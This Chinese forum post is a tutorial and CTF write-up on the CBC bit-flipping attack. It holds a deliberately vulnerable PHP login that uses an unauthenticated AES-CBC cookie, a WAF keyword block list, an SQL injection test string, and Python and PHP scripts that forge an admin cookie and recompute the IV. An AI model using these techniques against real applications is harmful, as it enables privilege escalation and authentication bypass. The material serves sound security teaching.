安全矩阵

 找回密码
 立即注册
搜索
查看: 4944|回复: 0

针对CBC字节反转攻击的研究与漏洞复现

[复制链接]

991

主题

1063

帖子

4317

积分

论坛元老

Rank: 8Rank: 8

积分
4317
发表于 2020-3-31 20:38:50 | 显示全部楼层 |阅读模式
本帖最后由 gclome 于 2020-3-31 20:41 编辑

原文链接:针对CBC字节反转攻击的研究与漏洞复现


CBC 简介现代密码体制
现代密码中的加密体制一般分为对称加密体制(Symmetric Key Encryption)和非对称加密体制(Asymmetric Key Encryption)。对称加密又分为分组加密和序列密码。

分组密码
分组密码:也叫块加密(block cyphers),一次加密明文中的一个块。是将明文按一定的位长分组,明文组经过加密运算得到密文组,密文组经过解密运算(加密运算的逆运算),还原成明文组,有 ECB、CBC、CFB、OFB 四种工作模式。
序列密码
序列密码:也叫流加密(stream cyphers),一次加密明文中的一个位。是指利用少量的密钥(制乱元素)通过某种复杂的运算(密码算法)产生大量的伪随机位流,用于对明文位流的加密。解密是指用同样的密钥和密码算法及与加密相同的伪随机位流,用以还原明文位流。

CBC 模式
CBC (Cipher Block Chaining, 密码分组链接) 模式中每一个分组要先和前一个分组加密后的数据进行XOR异或操作,然后再进行加密。这样每个密文块依赖该块之前的所有明文块,为了保持每条消息都具有唯一性,第一个数据块进行加密之前需要用初始化向量IV进行异或操作。CBC模式是一种最常用的加密模式,它主要缺点是加密是连续的,不能并行处理,并且与ECB一样消息块必须填充到块大小的整倍数。

CBC 模式的优缺点


CBC算法优点:
串行运算、相同明文不同密文。
CBC算法缺点:
需要初始向量、加密是连续的,不能并行处理。

CBC 工作模式Encryption



特殊名词
Plaintext:明文,待加密的数据。
IV :初始向量,用于随机化加密的比特块,保证即使对相同明文多次加密,也可以得到不同的密文。
Key:对称密钥,由AES,Blowfish,DES,Triple DES等对称加密算法使用。
Ciphertext:密文数据。
固定分组:CBC在一个固定长度的位组上工作,称为块。这里使用每个16字节的块进行讲解。


Encryption process
1、文字流程
Main:上一组密文块用来产生下一组密文块。
  1. 1、首先将明文分组(常见的以16字节为一组),位数不足的使用特殊字符填充。

  2. 2、生成一个随机的初始化向量(IV)和一个密钥。

  3. 3、将IV和第一组明文异或产生初步密文,再用密钥对初步密文加密生成最终密文块。

  4. 4、用3中产生的密文块对第二组明文进行xor操作产生初步密文,再用密钥对初步密文加密生成最终密文块。

  5. 5、重复4,到最后一组明文。

  6. 6、将IV和加密后的每个密文块拼接在一起,得到最终的密文。
复制代码

从第一块 Plaintext 开始,首先与一个初始向量iv异或(iv只在第一处起作用),然后把异或的结果经过key进行加密,得到第一块的密文,并且把加密的结果与下一块的明文进行异或,一直这样进行下去。
2、公式描述:
  1. Ciphertext-0 = Encrypt(Plaintext XOR IV)—只用于第一个组块

  2. Ciphertext-N = Encrypt(Plaintext XOR Ciphertext-(N-1))—用于第二及剩下的组块  # N > 1
复制代码

Decryption

Decryption process
1、文字流程
Main:上一组密文块影响下一组密文块的还原。
  1. 1、从密文中提取出IV,然后将密文分组。

  2. 2、使用密钥对第一组的密文解密,然后和IV进行xor得到明文。

  3. 3、使用密钥对第二组密文解密,然后和2中的密文xor得到明文。

  4. 4、重复2-3,直到最后一组密文。
复制代码

解密和加密的原理是一样的,都是

2、公式描述:
  1. Plaintext-0 = Decrypt(Ciphertext) XOR IV—只用于第一个组块

  2. Plaintext-N = Decrypt(Ciphertext) XOR Ciphertext-(N-1)—用于第二及剩下的组块   # N > 1
复制代码

CBC 字节反转攻击原理Attack 原理

1、在 CBC 解密的公式中可以注意到Ciphertext-(N-1)用来产生下一块明文,这就是字节翻转攻击发挥作用的地方。如果我们改变Ciphertext-N-1中的一个字节,然后和下一块解密后的密文xor,就可以得到一个不同的明文,而这个明文是我们可以控制的。
2、在1中的基础上,通过破坏密文中的字节来改变明文中的字节,由此在破坏的密文中添加单引号等恶意字符来绕过过滤器,或通过将用户ID更改为admin来提升权限,或者更改应用程序所需的明文造成其他后果。


Attack process


通过修改第一组的密文块字节,来构造自己想要的第二组明文块,当第一组密文块字节发生改变时会影响第一组明文块和第二组明文块。


漏洞复现
漏洞源码漏洞复现过程以 CTF 模式为例
  1. <?php
  2. include 'sqlwaf.php';
  3. define("SECRET_KEY", "Dfa5cUiJb2Xquhgv");
  4. define("METHOD", "aes-128-cbc");
  5. session_start();

  6. function get_random_iv(){
  7.     $iv='';
  8.     for($i=0;$i<16;$i++){
  9.         $iv.=chr(rand(1,255));
  10.     }
  11.     return $iv;
  12. }
  13. function login($info){
  14.     $iv=get_random_iv();
  15.     $plain = serialize($info);
  16.     $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
  17.     $_SESSION['username'] = $info['username'];
  18.     setcookie("iv", base64_encode($iv));
  19.     setcookie("cipher", base64_encode($cipher));
  20. }
  21. function show_homepage(){
  22.     if ($_SESSION["username"]==='admin'){
  23.         echo '<p>Hello admin</p>';
  24.         echo '<p>Flag is ***************************</p>';
  25.     }else{
  26.         echo '<p>hello '.$_SESSION['username'].'</p>';
  27.         echo '<p>Only admin can see flag</p>';
  28.     }
  29.     echo '<p><a href="loginout.php">Log out</a></p>';
  30.     die();
  31. }
  32. function check_login(){
  33.     if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
  34.         $cipher = base64_decode($_COOKIE['cipher']);
  35.         $iv = base64_decode($_COOKIE["iv"]);
  36.         if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){
  37.             $info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");
  38.             $_SESSION['username'] = $info['username'];
  39.         }else{
  40.             die("ERROR!");
  41.         }
  42.     }
  43. }

  44. if (isset($_POST['username'])&&isset($_POST['password'])) {
  45.   $username=waf((string)$_POST['username']);
  46.   $password=waf((string)$_POST['password']);
  47.   if($username === 'admin'){
  48.         exit('<p>You are not real admin!</p>');
  49.     }else{
  50.         $info = array('username'=>$username,'password'=>$password);
  51.         login($info);
  52.         show_homepage();
  53.     }
  54. }
  55. else{
  56.   if(isset($_SESSION["username"])){
  57.         check_login();
  58.         show_homepage();
  59.     }
  60. }
  61. ?>
  62. <!DOCTYPE html>
  63. <html lang="en" >
  64. <head>
  65.   <meta charset="UTF-8">
  66.   <title>Paper login form</title>
  67.       <link rel="stylesheet" href="css/style.css">
  68. </head>
  69. <body>
  70.   <div id="login">
  71.   <form action="" method="post">
  72.     <h1>Sign In</h1>
  73.     <input name='username' type="text" placeholder="Username">
  74.     <input name='password' type="password" placeholder="Password">
  75.     <button>Sign in</button>
  76. </div>
  77. </body>
  78. </html>
复制代码

waf 源码
  1. <?php
  2. function waf($str){
  3. $array=array("'","""," ","or","and","(",")","<","?");
  4. for ($i=0; $i < sizeof($array); $i++) {
  5.     if(strpos($str,$array[$i])){
  6.         echo "<script>alert('too young too simple,do not hack')</script>";
  7.         die();
  8.     }
  9. }
  10. return $str;
  11. }
  12. ?>
复制代码

题目Hint
题目Hint:Only admin can see flag!
漏洞利用与复现过程
初始页面显示


Injection 测试测试
username:
  1. admin' or '1'='1
复制代码
password:
  1. Random:**********
复制代码



Result



通过测试发现存在 Injection 拦截,先不要管,接着往下走
网站敏感信息扫描
通过扫描网站意外发现存在网页Bak文件


将Bak文件Down下来,进行代码审计
  1. <?php
  2. include 'sqlwaf.php';
  3. define("SECRET_KEY", "Dfa5cUiJb2Xquhgv");  //密钥key
  4. define("METHOD", "aes-128-cbc");   //使用AES算法128bit固定分组
  5. session_start();

  6. function get_random_iv(){    //初始化向量IV
  7.     $iv='';
  8.     for($i=0;$i<16;$i++){   //随机生成16字节长度的IV
  9.         $iv.=chr(rand(1,255));  
  10.     }
  11.     return $iv;
  12. }
  13. function login($info){   
  14.     $iv=get_random_iv();       //获取经过初始化的向量IV
  15.     $plain = serialize($info);  //将用户提交的信息进行序列化
  16.     $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);  //将变量$plain的值进行加密
  17.     $_SESSION['username'] = $info['username'];  //获取用户提交的用户名
  18.     setcookie("iv", base64_encode($iv));    //设置cookie:iv、cipher并将其值进行base64编码
  19.     setcookie("cipher", base64_encode($cipher));
  20. }
  21. function show_homepage(){      //判断网页提交的用户是否是"admin"
  22.     if ($_SESSION["username"]==='admin'){  //只有admin用户才能查看Flag
  23.         echo '<p>Hello admin</p>';
  24.         echo '<p>Flag is *******************************</p>';
  25.     }else{
  26.         echo '<p>hello '.$_SESSION['username'].'</p>';  //如果不是admin用户,网页则会显示"hello <username>"
  27.         echo '<p>Only admin can see flag</p>';  //查询失败
  28.     }
  29.     echo '<p><a href="loginout.php">Log out</a></p>';
  30.     die();
  31. }
  32. function check_login(){    //检查cookie:iv、cipher并将其值进行base64解码
  33.     if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
  34.         $cipher = base64_decode($_COOKIE['cipher']);
  35.         $iv = base64_decode($_COOKIE["iv"]);
  36.         if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){  //将cipher进行解密
  37.             $info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't  unserialize</p>"); //如果对变量$plain的值反序列化失败则会退出整个程序的执行
  38.             $_SESSION['username'] = $info['username'];  ////获取用户名
  39.         }else{
  40.             die("ERROR!");
  41.         }
  42.     }
  43. }

  44. if (isset($_POST['username'])&&isset($_POST['password'])) {   //判断用户的输入
  45.   $username=waf((string)$_POST['username']);   //对用户名进行安全检测
  46.   $password=waf((string)$_POST['password']);   //对用户密码进行安全检测
  47.   if($username === 'admin'){   //判断网页提交的用户是否是真实的"admin"
  48.         exit('<p>You are not real admin!</p>');
  49.     }else{
  50.         $info = array('username'=>$username,'password'=>$password);
  51.         login($info);
  52.         show_homepage();
  53.     }
  54. }
  55. else{
  56.   if(isset($_SESSION["username"])){
  57.         check_login();
  58.         show_homepage();
  59.     }
  60. }
  61. ?>
  62. <!DOCTYPE html>
  63. <html lang="en" >
  64. <head>
  65.   <meta charset="UTF-8">
  66.   <title>Paper login form</title>
  67.       <link rel="stylesheet" href="css/style.css">
  68. </head>
  69. <body>
  70.   <div id="login">
  71.   <form action="" method="post">
  72.     <h1>Sign In</h1>
  73.     <input name='username' type="text" placeholder="Username">
  74.     <input name='password' type="password" placeholder="Password">
  75.     <button>Sign in</button>
  76. </div>
  77. </body>
  78. </html>
复制代码

代码审计发现用户只能够使用admin进行查询Flag,但是代码会检测出你不是真实的admin,所以需要利用网页代理对抓取的网页数据包进行两次不同的利用。
第一次数据包的利用


由于刚开始用户的输入不能是admin所以提交用户名为"ddmin",但是只有是admin用户才能查看Flag,所以只能利用代码上的提示:define("METHOD", "aes-128-cbc"); 利用 CBC 字节反转攻击构造admin。

分析构造admin,明文分组16字节一组
  1. 原明文
  2. a:2:{s:8:"username";s:5:"ddmin";s:8:"password";s:5:"12345"}

  3. 明文分组
  4. 第一组:a:2:{s:8:"userna
  5. 第二组:me";s:5:"ddmin";
  6. 第三组:s:8:"password";s
  7. 第四组::5:"12345";}
复制代码
依据上述分组,通过修改第一组明文对应密文中的第10个字节来间接性修改第二组密文解密产生的明文,以此将"ddmin"修改为"admin"
python 脚本~1
  1. import base64
  2. import urllib.parse

  3. cipher = base64.b64decode(urllib.parse.unquote('mqyAyGTAv4dfyqwuz0mIu7HOBhqf9xStbNQgj4XKnnlIRBEc68i%2BV8hTS6IvQxYsEjzMBpMJO1s%2BFFmbw8jYxw%3D%3D'))  //这里放burp放回的base64的cipher数据
  4. x = cipher[0:9]+bytes([ord(chr(cipher[9]))^ord('d')^ord('a')])+cipher[10:]
  5. x = urllib.parse.quote(base64.b64encode(x))
  6. print(x)
复制代码
php 脚本~1
  1. <?php
  2. header("Content-Type: text/html;charset=utf-8");
  3.     $cipher = base64_decode(urldecode('mqyAyGTAv4dfyqwuz0mIu7HOBhqf9xStbNQgj4XKnnlIRBEc68i%2BV8hTS6IvQxYsEjzMBpMJO1s%2BFFmbw8jYxw%3D%3D'));  //这里放burp放回的base64的cipher数据
  4.     $temp = $cipher;
  5.     $cipher[9] = chr(ord($cipher[9]) ^ ord('d') ^ ord('a'));
  6.     echo urlencode(base64_encode($cipher));
  7. ?>
复制代码
运行结果
  1. mqyAyGTAv4dfz6wuz0mIu7HOBhqf9xStbNQgj4XKnnlIRBEc68i%2BV8hTS6IvQxYsEjzMBpMJO1s%2BFFmbw8jYxw%3D%3D
复制代码

第二次数据包的利用


将username和password提交的数据清空,并且将之前的 iv 和 修改过的cipher 添加到cookie字段中。此处利用的主要代码如下








对于发送的请求响应中看到对于密文解密出的明文反序列化失败,为了知道是怎么回事,我们将显示出来的base64代码进行解码。




从图中发现第一组的明文出现了问题,用户已经从"ddmin"成功修改为"admin",由于"第一次数据包利用"中修改了第一组密文,所以第一组和第二组的明文都会受到影响。要想第一组明文恢复正常,就要在"第一次数据包利用"中的基础上修改IV使之产生正确的明文。
python 脚本~2
  1. # -*- coding:utf8 -*-
  2. import base64
  3. import urllib.parse

  4. cipher = base64.b64decode('+g9Uzo1waJpEYbdiV+DYOm1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjU6IjEyMzQ1Ijt9')  //这里放burp放回的base64数据
  5. iv = base64.b64decode(urllib.parse.unquote('tWgzNB61rHp%2BzFZCLB6KQA%3D%3D'))   //这里放cookie中的iv
  6. newiv = ''
  7. right = 'a:2:{s:8:"userna'
  8. for i in range(16):
  9.     newiv += chr(ord(right[i]) ^ ord(chr(iv[i])) ^ ord(chr(cipher[i])))      //产生新的向量IV

  10. newiv = newiv.encode(encoding="utf8")
  11. print(urllib.parse.quote(base64.b64encode(newiv)))
复制代码

php 脚本~2
  1. <?php
  2.     #计算iv
  3.     $res = base64_decode('+g9Uzo1waJpEYbdiV+DYOm1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjU6IjEyMzQ1Ijt9');    //这里放burp放回的base64数据
  4.     $iv = base64_decode(urldecode('tWgzNB61rHp%2BzFZCLB6KQA%3D%3D')); //这里放cookie中的iv
  5.     $plaintext = 'a:2:{s:8:"userna';
  6.     $new_iv = '';
  7.     for ($i = 0; $i < 16; $i ++){
  8.         $new_iv = $new_iv . chr(ord($iv[$i]) ^ ord($res[$i]) ^ ord($plaintext[$i]));  //产生新的向量IV
  9.     }
  10.     echo urlencode(base64_encode($new_iv));
  11. ?>
复制代码
运行结果
  1. Ll1VwOi2%2FtgAj5RTHow8Gw%3D%3D
复制代码


重新发送第二次请求




get flag
  1. Flag is CBC{CBC is a good thing}
复制代码



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-12-1 01:31 , Processed in 0.015380 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表